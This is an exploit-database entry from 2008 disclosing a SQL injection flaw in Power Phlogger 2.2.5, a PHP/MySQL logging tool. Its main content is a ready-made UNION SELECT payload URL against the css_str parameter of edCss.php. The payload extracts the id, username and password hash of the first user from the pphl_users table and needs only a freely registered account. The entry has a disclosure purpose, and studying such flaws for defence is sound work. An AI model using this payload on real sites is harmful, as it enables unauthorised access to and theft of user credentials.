id: 3122
date: 06/04/2008
title: Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability
author: MustLive
cves: 

==========================================================
Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability
==========================================================



############################################################

SQL Injection vulnerability in Power Phlogger

Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.
 
SQL Injection:
 
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
 
With this query you will receive id, login and password (hash) of first user.
 
Vulnerable versions are Power Phlogger <= 2.2.5.
 
############################################################




#  0day.today [2023-03-27]  #